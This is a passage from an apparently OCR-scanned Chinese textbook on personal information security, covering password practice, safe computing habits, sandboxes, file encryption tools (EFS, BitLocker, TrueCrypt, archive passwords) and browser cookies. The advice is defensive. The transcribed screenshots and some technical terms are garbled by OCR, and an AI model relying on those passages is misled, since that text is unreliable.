外 的 特殊 字符 作为 密码 的 一 部 分 ,所 以 只 有 系统 允许 的 情况 下 ,我 们 可 以 加 入 软 键盘 特 
殊 字 符 , 例 如 ,希腊 字母 a.B、Y 等 。 

(3) 密码 长 度 不 能 过 短 。 一 般 推荐 为 16 位 ,长 的 密码 就 算是 只 有 数字 ,安全 性 也 提 
高 了 不 少 。 例如, 八 位 数字 密码 ,试探 次 数 为 10 的 8 次 方 ,但 十 六 位 数字 密码 则 是 10 的 
16 次 方 , 提 高 了 破解 难度 。 例 如 ,Alb@c#D$e%f^G&.h x 的 密码 强度 要 高 于 Alb@c 
#D$e%。 

(4) 密码 应 当 定期 更 换 。 密 码 长 时 间 不 更 换 有 泄露 的 可 能 ,不 一 定 是 自己 泄露 ,也 有 
可 能 是 被 黑客 攻击 导致 账号 信息 泄露 。 例 如 ,2011 年 12 月 ,最 大 的 中 文 IT 技术 社区 
CSDN 的 安全 系统 遭 到 黑客 攻击 ,600 万 用 户 的 登录 名 、 密 码 及 邮箱 遭 到 泄露 。 天 涯 网 
4000 万 用 户 隐私 遭 到 黑客 窃取 。 因 此 只 要 定期 修改 密码 ,就 算 密码 失窃 也 可 以 尽量 避免 
信息 泄露 。 


3. 账号 与 密码 的 保管 


我 们 设置 了 一 个 强度 高 的 密码 ,若是 存储 不 当 , 同 样 也 是 危险 的 。 最 安全 的 方法 当 
然 是 存储 于 自己 的 大 脑 , 不 要 告诉 别人 ,只 有 自己 知道 。 但 若是 用 户 忘 记 密 码 而 系统 的 
密码 找 回 又 不 完善 ,或 是 用 户 设 的 密码 复杂 度 高 但 是 难 记 ,这 时 要 怎么 办 ? 若是 存储 于 
计算 机 中 ,密码 有 可 能 被 黑客 或 病毒 软件 窃取 。 若 是 存储 于 书本 上 ,密码 很 有 可 能 被 无 
关 人 员 看 到 或 丢失 。 那 我 们 该 如 何 安全 有 效 地 进行 密码 管理 呢 ? 

我 们 可 以 采用 密码 管理 软件 。 例 如 ,安全 厂商 出 品 的 密码 管理 软件 ,如 avast 出 品 的 
EasyPass、 瑞 星 账 号 保险 柜 , 还 有 知名 的 KeePass、LastPass, 最 近 非 常 火 的 跨 平 台 密码 管 
理 软件 1Password 等 。 但 将 密码 托付 于 密码 保管 服务 提供 商 也 并 不 是 就 高 枕 无 忧 了 ， 
2015 年 6 月 16 日 ,LastPass 在 周一 的 报告 中 称 公 司 网 络 上 周 五 被 黑客 攻破 ,虽然 没有 丢 
失 用 户 存储 的 密码 ,但 用 户 部 分 账户 信息 被 窃取 ,例如 ,电子 邮箱 .电话 等 信息 。 

其 次 我 们 也 可 以 采用 拆 分 保管 的 方式 。 例 如 ,我们 只 需 记 部 分 密码 , 另 一 部 分 密码 
另外 存储 。 我 们 可 以 在 电脑 中 存储 特殊 字符 ,我 们 在 脑 中 只 需 记 住 容易 记 的 部 分 。 例 
如 ,密码 为 Alb@c#DS$e%fAG&hx12, 我 们 只 需 记 得 “AbcDefGh12”, 中 间 选 择 要 加 入 
的 特殊 字符 我 们 可 以 存储 在 电脑 中 或 写 在 书 上 。 或 是 我 们 只 记 前 半 部 分 “Alb@c#D 
$e%”, 后 半 部 分 跟 之 前 所 说 的 一 样 存储 于 其 他 地 方 。 


236 养 成 良好 的 计算 机 使 用 习惯 


培养 了 良好 的 安全 意识 ,采用 了 一 定 的 安全 防护 措施 ,我 们 还 需要 养 成 良好 的 计算 
机 使 用 习惯 。 网 上 有 一 部 分 人 的 论调 是 “就 算 不 使 用 安全 防护 软件 ,良好 的 计算 机 使 用 
习惯 也 可 以 帮助 我 们 避免 感染 病毒 ”。 这 句 话 虽然 过 分 绝对 ,但 还 是 有 一 定 道理 ,良好 的 
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计算 机 使 用 习惯 可 以 避免 个 人 电脑 处 于 危险 的 境地 。 
1. 不 轻易 使 用 可 疑 的 计算 机 


如 果 一 台 计 算 机 被 认为 是 可 能 已 经 被 感染 的 对 象 ,请 不 要 轻易 地 使 用 它 。 应 当 对 其 
进行 全 面 的 安全 检查 后 再 进行 使 用 ,否则 一 些 病毒 会 上 传 用 户 数据 ,有 可 能 造成 个 人 信 
息 的 泄露 。 网 吧 的 电脑 或 一 些 公 用 电脑 也 属于 可 疑 的 计算 机 ,对 于 一 些 大 型 的 正规 网 
吧 , 装 有 还 原 软件 .还 原 卡 并 定期 维护 ,是 可 以 信赖 的 。 但 一 些 管理 不 规范 的 网 吧 ,存在 
不 及 时 打 补 丁 , 被 植 人 木马 等 情况 ,我 们 使 用 前 要 先 确定 其 安全 状况 再 决定 使 用 程度 。 


2. 访问 正规 的 网 站 


我 们 在 使 用 电脑 的 时 候 , 尽 量 访问 正规 的 网 站 。 在 互联 网 发 展 的 早期 正规 网 站 也 避 
免不了 被 挂 马 之 类 的 安全 威胁 ,虽然 现在 也 存在 ,但 随 着 网 站 对 于 安全 方面 越 来 越 重视 ， 
此 类 情况 鲜 有 发 生 。 但 有 很 多 非 正规 网 站 存在 着 许多 页 面 已 被 木马 或 病毒 感染 ,访问 这 
些 网 站 是 有 被 感染 的 风险 的 。 这 些 网 站 往往 标题 很 有 诱惑 力 , 吸 引 互 联网 用 户 的 点 击 ， 
我 们 要 控制 住 自 己 的 好 奇 心 ,不 要 随意 点 击 不 明 链 接 。 现 在 很 多 安全 防护 软件 也 有 包含 
对 恶意 网 页 进行 过 滤 的 功能 ,在 访问 恶意 网 页 时 会 有 一 定 的 提示 ,对 于 很 多 不 明 的 网 页 
弹 窗 也 会 进行 拦截 。 用 户 最 好 不 要 关闭 这 些 功 能 ,保持 开启 。 


3, 不 要 轻易 留 下 自己 的 真实 资料 


许多 网 站 都 要 求 输入 个 人 的 隐私 资料 ,例如 ,姓名 、 年 龄 .生日 .身份 证 号 ,家庭 住址 、 
性 别 等 , 若 不 是 必要 情况 下 ,并 不 推荐 用 户 输入 真实 信息 ,甚至 就 算是 官方 机 构 也 有 可 能 
造成 信息 泄露 。 例 如 ,2014 年 底 发 生 的 研究 生 报名 信息 数据 库 在 网 上 进行 贩卖 ,130 万 
考生 所 有 信息 都 在 网 上 进行 兜售 。 一 些 非 正 规 的 网 站 的 安全 状况 更 是 堪忧 。 


4. 不 要 轻易 打开 不 明文 件 


从 网 上 下 载 的 文件 首先 要 经 过 杀毒 后 再 进行 打开 ,否则 很 有 可 能 感染 病毒 。 我 们 也 
可 以 使 用 沙 箱 或 者 虚拟 机 进行 打开 。 虚 拟 机 的 使 用 需要 一 定 的 计算 机 基础 ,但 沙 箱 则 是 
很 多 安全 防护 软件 都 带 有 的 功能 。 沙 箱 是 一 个 虚拟 系统 程序 ,允许 用 户 在 沙 箱 环境 中 运 
行 浏览 器 或 其 他 程序 ,允许 后 的 变化 可 以 随后 删除 。 这 是 一 种 按照 安全 策略 限制 程序 行 
为 的 执行 环境 ,早期 主要 用 于 测试 可 疑 软 件 等 。 许 多 安全 防护 软件 都 带 有 沙 箱 功能 , 例 
如 , 科 摩 多 ,avast \ 腾 讯 安 全 管家 、360 安全 卫士 等 。 沙 箱 的 一 般 使 用 方法 为 运行 不 明 程 
序 时 沙 箱 会 自动 激活 ,或 是 单 击 沙 箱 的 图 标 ,之 后 可 以 指定 运行 的 程序 。 例 如 ,我 们 打开 
360 隔离 沙 箱 后 ,可 以 运行 指定 的 可 疑 程序 ,如 图 2. 22 所 示 。 


5. 清除 电脑 使 用 痕迹 


清除 电脑 使 用 痕迹 的 方法 有 很 多 ,也 有 许多 内 容 需 要 清理 。 普 通用 户 仅 使 用 安全 防 
护 软 件 或 安全 辅助 软件 自 带 的 电脑 使 用 痕迹 清理 功能 就 可 以 了 。 而 对 于 有 一 定 基础 的 
读者 ,可 以 清除 最 近 使 用 过 的 文档 记录 、 删 除 注册 表 中 LHKEY_CURRENT_USERA\ 


96 


状态 设置 @ PeakEaPTR CE 
沽 计 沙 祠 - 产 拟 环 卉 已 经 建立 ， 放 心 使 用 有 风险 软件 ， 一 切 不 至 户 迹 . 

文件 列表 

在 应 去 

例外 列表 

全 过 
安全 视频 搜索 运行 提 定 程序 清理 沙 箱 文件 

和 360 阿 高 沙 箱 棕 自动 避 别 有 风险 的 禾 放 舌 、 虹 子 蔬 阳 序 ， 并 漳 窗 村 示 伯 岳 高 运行 . 

me 当前 沙 重点 用 空间 : 小 于 1MB , 上 次 清除 了 11MB 沙 补 内 程序 所 占 的 空间 . 


版 本 : 3.5.0.102 


2.22 360 隔离 沙 箱 


Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ] 分 支 下 的 记录 , 即 
删除 查找 历史 记录 、 删 除 C:\Windows\Temop 与 C:\Documents And Settings\ 用 户 名 \ 
LocalSettings\Temp、 清 空 Internet 临时 文件 夹 .删除 cookie、 清 除 IE 记 住 的 表单 内 容 、 
清除 软件 登录 信息 ,删除 下 载 记录 、 清 除 播放 记录 等 。 


6. 使 用 电脑 时 不 暴露 在 别人 的 视野 下 


我 们 在 录入 信息 时 应 当 正 确 摆 放 电脑 屏幕 的 位 置 , 且 不 应 在 装 有 监控 软件 的 计算 机 
上 输入 个 人 信息 ,也 避免 在 安装 有 监控 设备 的 场合 中 录入 个 人 信息 ,不 要 在 公开 场合 录 
入 信息 ,熟练 的 计算 机 使 用 者 可 以 凭借 观察 很 容易 地 就 获得 账号 密码 。 


237 常见 的 个 人 信息 保护 手段 


1. 文档 的 安全 防护 


计算 机 已 经 成 为 一 个 在 生产 或 生活 中 不 可 或 缺 的 工具 。 我 们 在 开展 各 种 活动 的 过 
程 中 会 留 下 不 少 记录 ,许多 成 果 也 是 以 文档 的 形式 呈现 ,我 们 文档 的 安全 性 如 何 保证 ? 
若是 黑客 人 侵 了 受害 者 的 主机 ,轻而易举 地 可 以 获得 任何 资料 ,各 类 重要 文档 若是 处 于 
不 设防 的 情况 下 ,我 们 的 重要 信息 很 容易 泄露 。 

常见 的 文档 有 Word 文档 、PowerPoint (PPT) 文 档 、Excel 文档 、PDF 文档 等 。 我 们 
可 以 采取 如 下 的 方法 来 保护 文档 不 被 泄露 或 尽 可 能 地 减少 文档 被 窃取 后 信息 公开 的 
危险 。 

(1) 采用 文档 加 密 工 具 。 常 见 的 一 般 工 具有 Word 文档 加 密 器 .PPT 文档 加 密 器 、 文 
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本 文件 加 密 器 、Excel 文档 加 密 器 、PDF 文档 加 密 器 等 。 这 些 文档 加 密 器 使 用 简单 ,易于 
操作 ,安全 性 强 。 例 如 ,最 为 常见 的 Word 文档 加 密 器 V6.0 版 ,包含 的 功能 有 加 密 Word 
文档 ,支持 . doc、. rtf、. docx、. docm; 保 护 Word 文档 分 发 ,防止 编辑 、 防 止 复 制 \ 防 止 打 
印 ; 用 户 打 开 受 加 密 保护 的 文档 时 ,加 密 文 件 会 弹出 验证 框 要 求 用 户 输入 阅读 密码 ,这 个 
验证 框 中 同时 显示 有 用 户 的 机 器 码 , 用 户 可 以 发 送 他 的 机 器 码 给 你 ,你 根据 用 户 的 机 器 
码 为 他 创建 阅读 密码 ;由 于 阅读 密码 是 基于 用 户 机 器 码 创 建 的 ,所 以 用 户 无 法 传播 阅读 
密码 和 文档 ;只 有 知道 加 密 密 钥 的 人 才 可 以 为 用 户 创建 阅读 密码 。 但 此 类 文档 加 密 器 虽 
然 功能 强大 ,但 大 部 分 需要 进行 收费 ,若是 一 般 用 户 不 需要 使 用 到 这 些 功 能 ,不 妨 试 试 下 
一 种 方法 。Word 文档 加 密 器 V6. 0 版 界面 如 图 2. 23 所 示 。 


区。_Word 文 档 加 客 孝 Y6.0 
[文档 m 密 [提示 语 设置 [_ 蚀 哇 网 夺 密 码 ] [ 关于 | 


sone 


请 指定 加 密 秘 骨 | 允许 打印 文档 允许 免费 预览 加 窗 文 档 [0 ] 秒 


” 沈 择 加 密 模 式 “加密 文件 与 用 户 硬件 绑 定 一 
| 中国 潜 密 码 不 九 定 电脑 ; ALL Computers,One Password 加 主板 CPU 

| 他 亲密 码 关 定 电脑 ， 一 机 一 码 ; One Computer,One Password 加 而 全 

word2exe : 转换 word 为 exe 格 式 ， 不 要 密码 回 网 卡 岩 定 


-网络 发 放 癌 读 密码 ,无 着 人 工 参 与 一 = 一 
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2.23 ”Word 文档 加 密 器 V6.0 版 


(2) 利用 Microsoft Office 或 WPS Office 自 带 的 加 密 功 能 进行 加 密 。Microsoft 
Office 办 公 套 件 与 金山 软件 股份 有 限 公司 出 品 的 WPS Office 在 市 场 上 占据 着 巨大 的 份 
额 。 当 安全 性 越 来 越 受 关注 的 今天 ,这 些 产品 不 仅 可 以 帮助 我 们 进行 文字 处 理 , 还 自 带 
了 一 些 安全 保障 功能 ,例如 ,我 们 现在 所 说 的 加 密 文档 。 在 Microsoft Office 2003 系列 办 
公 软 件 中 ,我 们 依次 单 击 菜单 栏 当 中 的 “工具 ”一 “选项 ”按钮 ,在 新 出 现 的 界面 中 选择 “ 安 
全 性 ”选项 卡 。“ 安 全 性 ”选项 卡 如 图 2. 24 所 示 。 在 图 中 我 们 可 以 看 到 ,我 们 可 以 选择 设 
置 此 文档 打开 文件 时 的 密码 与 修改 文件 时 的 密码 。 

而 对 于 不 同 版 本 的 Microsoft Office 办 公 套 件 , 设 置 密码 的 方式 有 些 差别 但 大 同 小 
异 。 例 如 ,Microsoft Office 2007 将 文档 的 权限 设置 放置 在 了 “Office 按钮 >- 准备 ”中 。 
如 图 2. 25 所 示 。 

Microsoft Office 2010 对 文档 权限 设置 则 是 单 击 “ 文 件 ”>“ 信 息 ” 一 “保护 工作 簿 ” 按 
钮 进行 设置 。 

除了 微软 的 办 公 套 件 ,我们 较为 常用 的 还 用 WPS Office 办 公 套 件 , WPS 设置 文档 加 
密 也 是 同样 的 简单 。 在 最 新 版 本 中 ,我 们 只 需要 选择 左上 方 的 WPS 按钮 “文件 信息 ”一 


图 2.24 Microsoft Office 2003 安全 性 选项 卡 


图 2.25 ”Microsoft Office 2003 准备 选项 


“文件 加 密 ” 选 项 ,之 后 在 弹出 的 界面 中 分 别 设置 打开 文件 的 密码 与 编辑 文件 的 密码 。 界 
面 如 图 2. 26 所 示 。 


贺 先 责 


E00 
点 击 “高 级 ” 控 角 选择 不 同 的 加 密 类 型 ， 可 以 为 您 的 文档 设置 不 同 级 另 折 3 加 密 保护 

打开 权限 : 

打开 文件 呈 码 (0) 

再 次 刍 入 至 码 () 

坊 和 权限 - 

从 收文 件 宇 码 0 

再 次 键入 密码 (8) 

隐私 近 大 -一 一 

Ft 


x 


el Ee 


[mm le | 
2.26 WPS Office 设置 文档 密码 界面 


但 我 们 需要 注意 的 是 ,虽然 设置 了 密码 ,但 并 不 代表 文档 就 可 以 随意 分 发 。 设 置 了 
密码 文档 对 安全 性 有 提升 ,但 还 是 有 不 少 方法 对 Office 文档 密码 进行 破解 , 且 有 些 方法 
特别 简单 。 因 此 我 们 还 是 不 能 大 意 。 
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2. 图 片 .视频 及 其 他 文件 的 防护 


对 于 图 片 、 视 频 及 其 他 重要 文件 的 防护 也 是 同样 重要 的 。 文档 有 专门 的 加 密 工 具 ， 
图 片 或 视频 之 类 的 大 文件 是 否 也 有 办 法 降低 其 泄露 的 可 能 ? 图 片 与 视频 之 类 的 文件 被 
泄露 后 所 造成 的 影响 想必 我 们 都 略 有 耳闻 ,许多 场景 下 都 有 可 能 造成 这 些 文件 的 流出 ， 
以 下 介绍 几 种 方法 可 以 提供 此 类 文件 的 安全 性 ,一 些 方法 对 于 文档 同样 适用 。 

首先 ,我 们 可 以 利用 一 些 专业 软件 来 保障 图 片 与 视频 及 其 他 文件 的 安全 性 。 例 如 ， 
瑞星 公司 出 品 的 瑞星 加 密 盘 , 瑞 星 加 密 盘 是 一 款 具 有 数据 文件 加 密 功 能 的 免费 安全 工 
具 。 安 装 瑞星 加 密 盘 后 ,会 在 电脑 硬盘 中 开设 一 个 独立 区 域 , 通 过 多 种 高 强度 加 密 技术 ， 
保证 文件 安全 。 用 户 可 像 访问 正常 分 区 一 样 ,通过 密码 轻松 访问 加 密 盘 ,将 个 人 照片 、 视 
频 、 上 网 记录 、 聊 天 记录 等 私密 文件 进行 加 密 , 杜 绝 了 个 人 隐私 泄露 的 危险 。 还 有 隐身 侠 
文件 夹 加 密 工具 ,其 分 为 硬件 版 与 软件 版 。 软 件 版 包括 的 基础 功能 有 : 保险 箱 加 密 功 能 ， 
加 密 电脑 .U 盘 ,移动 硬盘 中 各 种 文件 ,让 信息 不 会 泄露 ;备份 与 恢复 功能 ,保险 箱 增 量 备 
份 . 多 点 恢复 与 还 原 ,让 用 户 的 资料 双 保 险 , 轻 松 备份 ,信息 不 怕 丢 失 ; 加 密云 盘 功 能 ,可 
将 文件 上 传 到 * 云 ”, 并 可 在 任何 地 方 联网 存 取 ;粉碎 文件 功能 ,彻底 解决 删除 文件 可 被 恢 
复 带 来 的 安全 隐患 。 硬 件 版 则 是 类 似 一 个 钥匙 ,在 软件 的 基础 上 与 硬件 相 结 合 ,功能 则 
与 软件 版 相 类 似 。 还 有 TrueCrypt, 这 是 一 款 免 费 开源 的 加 密 软件 ,同时 支持 Windows 
Vista、Windows 7、Windows XP、Mac OS X、Linux 等 操作 系统 。TrueCrypt 不 需要 生成 
任何 文件 即 可 在 硬盘 上 建立 虚拟 磁盘 ,用 户 可 以 按照 盘 符 进行 访问 ,所 有 虚拟 磁盘 上 的 
文件 都 被 自动 加 密 , 需 要 通过 密码 来 进行 访问 。TrueCrypt 提供 多 种 加 密 算 法 ,包括 
AES-256, Blowfish(448-bit key) .CAST5、Serpent、Triple DES 和 Twofish, 其 他 特性 还 
有 支持 FAT32 和 NTFS 分 区 .隐藏 卷 标 . 热 键 启动 等 。 

我 们 还 可 以 使 用 Windows 系统 自 带 的 加 密 功 能 进行 加 密 , 其 中 之 一 为 EFS。 什 么 
是 EFS? EFS 加 密 是 基于 公 钥 策略 的 。 在 使 用 EFS 加 密 一 个 文件 或 文件 夹 时 ,系统 首 
先 会 生成 一 个 由 伪 随 机 数组 成 的 文件 加 密 钥匙 (File Encryption Key ,FEK) ,然后 将 利用 
FEK 和 数据 扩展 标准 X 算法 创建 加 密 后 的 文件 ,并 把 它 存 储 到 硬盘 上 ,同时 删除 未 加 密 
的 原始 文件 。 随 后 系统 利用 你 的 公 钥 加 密 FEK ,并 把 加 密 后 的 FEK 存储 在 同一 个 加 密 
文件 中 。 而 在 访问 被 加 密 的 文件 时 ,系统 首先 利用 当前 用 户 的 私 钥 解密 FEK ,然后 利用 
FEK 解密 出 文件 。 在 首次 使 用 EFS 时 ,如 果 用 户 还 没有 公 钥 / 私 钥 对 (统称 为 密 钥 ), 则 
会 首先 生成 密 钥 ,然后 加 密 数 据 。 如 果 你 登录 到 了 域 环境 中 , 密 钥 的 生成 依赖 于 域 控制 
器 ,否则 依赖 于 本 地 机 器 。EFS 加 密 系 统 对 用 户 是 透明 的 。 这 也 就 是 说 ,如 果 你 加 密 了 
一 些 数据 ,那么 你 对 这 些 数据 的 访问 将 是 完全 允许 的 ,并 不 会 受到 任何 限制 。 而 其 他 非 
授权 用 户 试 图 访问 加 密 过 的 数据 时 ,就 会 收 到 “访问 拒绝 ”的 错误 提示 。EFS 加 密 的 用 户 
验证 过 程 是 在 登录 Windows 时 进行 的 ,只 要 登录 到 Windows, 就 可 以 打开 任何 一 个 被 授 
权 的 加 密 文件 。 具 体 的 EFS 加 密 步 又 为 , 右 击 想 要 加 密 的 文件 夹 , 单 击 “ 属 性 ”一 “常规 ” 
一 “高 级 "按钮 ,在 弹出 的 名 为 “高 级 属性 ”窗口 中 色 选 加 密 内 容 以 便 保护 数据 。 在 单 击 
“确定 ”按钮 后 ,将 更 改 应 用 于 此 文件 夹子 文 件 夹 和 文件 ,接着 我 们 可 以 看 到 被 加 密 的 文 
件 夹 名 字 已 经 变 成 了 绿色 ,若是 另 一 个 用 户 登 录 此 计算 机 , 另 一 个 用 户 访 问 该 文件 夹 会 提 
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示 拒 绝 访问 。 我 们 也 可 以 使 用 BitLocker。 从 Vista 开始 ,微软 提供 了 名 为 BitLocker 的 
系统 自 带 加 密 功 能 ,在 Windows 7 中 ,这 个 功能 更 加 完善 ,使 用 简单 ,加密 效果 非常 好 , 特 
别 在 移动 设备 上 使 用 非常 方便 。 在 了 解 BitLocker 原理 之 前 我 们 先 要 知道 什么 是 TPM。 
TPM 是 一 个 微 芯片 ,设计 用 于 提供 基本 安全 性 相关 功能 ,主要 涉及 加 密 密 钥 。TPM 通 
常安 装 在 台式 计算 机 或 者 便携 式 计 算 机 的 主板 上 ,通过 硬件 总 线 与 系统 其 余部 分 通信 。 
BitLocker 使 用 TPM 帮助 保护 Windows 操作 系统 和 用 户 数据 ,并 帮助 确保 计算 机 即使 
在 无 人 参与 .丢失 或 被 次 的 情况 下 也 不 会 被 算 改 。BitLocker 还 可 以 在 没有 TPM 的 情况 
下 使 用 。 若 要 在 计算 机 上 使 用 BitLocker 而 不 使 用 TPM, 则 必须 通过 使 用 组 策略 更 改 
BitLocker 安装 向 导 的 默认 行为 ,或 通过 使 用 脚本 配置 BitLocker。 使 用 BitLocker 而 不 
使 用 TPM 时 ,所 需 加 密 密 钥 存储 在 USB 闪存 驱动 器 中 ,必须 提供 该 驱动 器 才能 解锁 存 
储 在 卷 上 的 数据 。 例 如 ,我 们 可 以 对 我 们 常见 的 U 盘 启 用 BitLocker。 具 体 方法 为 右 击 
U 盘 ,启用 BitLocker, 之 后 我 们 可 以 在 弹出 的 BitLocker 驱动 器 加 密 窗口 中 选择 希望 解 
锁 此 驱动 器 的 方式 ,如 图 2. 27 所 示 。 


全。 号 BitLocker 驱动 器 加 刻 (G:) 


选择 希望 解锁 此 驱动 器 的 方式 


使 用 密码 解锁 驱动 器 (P) 
密码 应 该 包含 大 小 写字 母 、 数 字 、 空 格 以 及 符号 。 


输入 密码 (日 


重新 输入 密码 (R) 


使 用 智能 卡 解 钠 9E 动 器 (S) 
你 构 需 要 插入 智能 卡 。 解 锦 驱 动 嚣 时， 将 需要 智能 卡 PIN。 


Fm i | 
2.27 选择 希望 解锁 此 驱动 器 的 方式 


还 有 一 种 很 常见 的 加 密 方式 ,使 用 压缩 软件 进行 加 密 , 这 个 方法 适用 于 大 部 分 文件 。 
对 于 大 文件 这 个 方法 可 能 速度 较 慢 , 且 每 次 访问 文件 较为 麻烦 ,但 这 是 一 种 普及 率 高 , 安 
全 性 强 的 个 人 信息 加 密 方法 。 常 见 的 压缩 软件 有 WinRAR、WinZip、7Zip、 好 压 等 。 对 于 
我 们 想 要 保密 的 文件 ,我 们 对 其 添加 到 压缩 包 , 之 后 在 弹出 的 压缩 界面 中 选择 设置 密码 
或 密码 选项 卡 ,设置 密码 后 进行 压缩 存储 。 好 压 的 压缩 密码 界面 如 图 2. 28 所 示 。 


3. 浏览 器 防护 
目前 ,可 供 人 们 选择 的 浏览 器 很 多 ,除了 最 常见 的 Microsoft 出 品 的 IE 系列 浏览 器 、 
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第 规 ”这 码 文件 ”算法 。 时间 。 注释 


带 密码 压缩 
输入 密码 (1) 


再 次 输入 密码 以 确认 (A) 


口 显 示 密码 (S) 《 勾 选 可 支持 中 文 密码 输入 ) 
加 密 文件 名 他 ) 。( 仅 限 72 格 式 ) 


切 近 至 本 模式 WECO | | mWO | | NmH | 


2.28 好 压 的 压缩 密码 界面 


edge 浏览 器 ,还 有 chrome 谷歌 浏览 器 ,Safari 苹果 浏览 器 、Firefox 火狐 浏览 器 .Opera 浏 
览 器 .maxthon 邀 游 浏 览 器 .世界 之 窗 浏览 器 .搜狗 浏览 器 .QQ 浏览 器 .360 安全 浏览 器 ， 

浏览 器 是 我 们 日 常 工作 生活 中 必须 要 用 到 的 ,也 是 我 们 获取 、 传 递 信息 的 主要 工具 。 
在 上 文 的 4 报告 》 中 我 们 也 能 够 发 现 ,网 民 个 人 信息 的 泄露 大 多 数 都 是 通过 浏览 器 。 如 何 
加 强 上 网 时 浏览 器 的 安全 呢 ? 我 们 可 以 看 一 看 浏览 器 中 有 哪些 方面 涉及 我 们 的 隐私 
安全 。 

1) cookie 

cookie, 英 文 翻译 的 意思 是 “饼干 ”。 至 于 为 什么 叫 作 * 饼 干 ”, 这 有 许多 种 说 法 。 有 人 
说 cookie 源 自 海外 中 国 餐馆 在 客人 用 完 餐 离 开 前 向 客人 所 赠 “ 幸 运 小 饼干 ”, 里 面 都 有 一 
张 小 字 条 , 印 有 一 张 让 客人 开心 一 笑 的 警句 之 类 的 吉祥 话 , 有 的 还 黎 有 其 事 地 描绘 客人 
的 个 性 特点 ,为 客人 下 算 前 程 。 然 而 这 在 电脑 上 可 能 一 点 都 不 幸运 ,虽然 “饼干 ”的 出 现 ， 
给 计算 机 用 户 带 来 了 许多 便利 。 例 如 ,我 们 在 登录 一 个 网 站 的 时 候 , 只 要 输入 账户 的 前 
几 个 字母 ,曾经 使 用 过 的 账号 和 密码 就 会 自动 填充 ,我 们 不 用 再 费事 地 想 很 久 账 户 和 密 
人 码 是 什么 。 许 多 服务 提供 商 也 可 以 根据 cookie 获取 用 户 信 息 , 可 以 得 知 用 户 访问 了 哪些 
网 页 .停留 多 久 等 信息 ,从 而 根据 这 些 信 息 为 用 户 推荐 他 可 能 感 兴趣 的 内 容 。 但 它 宕 探 
用 户 的 隐私 使 人 如 芒 在 背 ,感到 不 安 。cookie, 有 时 也 用 其 复数 形式 cookies, 指 某 些 网 站 
为 了 辨别 用 户 身 份 、 进 行 session 跟踪 而 存储 在 用 户 本 地 终端 上 的 数据 (通常 经 过 加 密 )。 
简 而 言 之 ,cookie 是 存储 在 用 户 计算 机 上 的 一 段 文本 信息 ,主要 实现 计算 机 记忆 用 户 浏 
览 过 的 账户 密码、 网 址 等 功能 .使 用 户 操 作 更 加 便捷 。 

cookie 按 保留 的 性 质 来 分 可 以 分 为 临时 cookie 与 永久 cookie。 临 时 cookie 也 称 为 
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会 话 cookie, 不 设置 过 期 时 间 , 这 表示 这 个 cookie 生命 周期 为 浏览 器 会 话 期 间 , 只 要 关闭 
浏览 器 窗口 ,cookie 就 消失 了 。 临 时 cookie 一 般 不 保存 在 硬盘 上 而 是 保存 在 内 存 里 。 但 
若是 设置 了 过 期 时 间 ,浏览 器 就 会 把 cookie 保存 到 硬盘 上 ,关闭 后 再 次 打开 浏览 器 ,这 些 
cookie 依然 有 效 直 到 超过 设 定 的 过 期 时 间 ,这 就 是 我 们 所 说 的 永久 cookie, 也 被 称 为 已 保 
存 cookie。 

cookie 按 来 源 级 别 来 分 , 则 可 以 分 为 第 一 方 cookie 与 第 三 方 cookie。 第 一 方 cookie 
指 的 是 我 们 用 户 正 在 浏览 的 网 站 所 形成 的 cookie, 第 三 方 cookie 指 的 是 我 们 正在 访问 的 
网 站 加 载 了 另外 的 网 站 ,另外 的 网 站 形成 了 自己 的 cookie。 第 三 方 cookie 的 产生 最 常见 
的 就 是 当前 访问 网 站 加 载 了 第 三 方 代码 ,例如 ,我 们 有 时 候 访问 一 个 网 站 ,网 站 上 有 很 多 
广告 ,这 些 广告 就 是 第 三 方 cookie。 但 不 论 是 第 一 方 cookie 还 是 第 三 方 cookie, 都 是 为 
了 记录 与 跟踪 用 户 的 上 网 行为 。 

那么 cookie 存放 在 哪里 呢 ? 在 Windows NT/2000/2003/XP 系统 下 ,cookie 存放 目 
录 是 C:\Documents and Settings\Administrator\cookies 文件 夹 下 ;在 Windows Vista/7 
系统 下 ,cookie 的 存放 目录 是 C:;\Users\Administrator\AppData\Roaming\Microsoft\ 
WindowsNcookies。 若 用 户 名 不 为 Administrator 则 将 连接 改 为 相应 的 用 户 名 ,输入 地 址 
栏 即 可 访问 。 

不 只 是 可 以 在 文件 夹 下 查看 ,最 方便 的 办 法 是 ,通过 一 些 工 具 进 行 查看 ,例如 ,许多 


WA 本 jo 、 昌林 
浏览 器 都 带 有 查看 cookie 的 功能 。 我 们 访问 百度 网 址 时 ,通过 傲游 浏览 器 查看 的 cookie 
如 图 2. 29 所 示 。 
BOEIR - https//wwwbaidu.com/indexphp?tn=maxthon2&ich=2 
元 素 | 次 病 | 网 络 源 代码 时 间 线 性 能 分 析 审查 控制 台 
下 门 页 面 框架 名 称 a| 值 | 域 路径 | 过 .， | 大 小 HTTP | 安全 
| Gndecphp) BAIDUID | 4F87ADB44339FC... | baidu.com Vv Mo | 44 
E BDRCVFRIqztQtC... | aeXf-DSUdYcs | .baidu.com 7 会 笑 | 3 
vwebsar BDUSS LAWWZGZH5WZ... | .baidu.com / |Tve] I) v 
» FjindexedDB BD_HOME |i www.baidu.com /1 | 会 和 | 8 
* 国 Local stonoe BD_UPN 17314353 | wwwbaiducom 1/ Sat| 14 
» 国 Session Storage BIDUPSID | 222847AC9C1FF3., | baiducom | |Tau.| 4 
v 丽 cooue HLpS_pPSSID 1448_16478_16974... | .baidu.com / 会 活 92 
[ER ORIGIN io www.baidu.com 1/ |we-.| 7 
= 一 一 PSTM 1439910066 | baiducom / Mo | 14 
* 国 Application Cache bdime 有 www baiducom / |we| 6 
ispeed_km 0 www.baidu.com 1/ |Sat.| 1 
suq 3 www.baidu.com 1 |We.| 4 
suqstore lo | wwwbaiducom 1/ |we.| 9| 
| | | 
| 
| 
| 
加 ,QQ Cex 014 大 


2.29 傲游 浏览 器 开发 者 工具 中 查看 到 百度 网 站 的 cookie 
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通过 工具 所 查看 到 的 cookie 更 为 直观 ,可 以 很 明显 地 看 出 确实 跟踪 记录 了 我 们 很 多 
信息 。 它 们 不 是 程序 也 不 是 病毒 ,只 是 一 段 记录 的 文本 ,本 身 不 会 给 计算 机 带 来 风险 ,但 
若是 被 黑客 所 利用 ,进行 解密 与 挖掘 ,我 们 的 个 人 信息 还 是 会 被 人 非法 获得 。 因 此 常见 
的 对 cookie 的 利用 有 算 改 、 冒 用 与 欺骗 。 

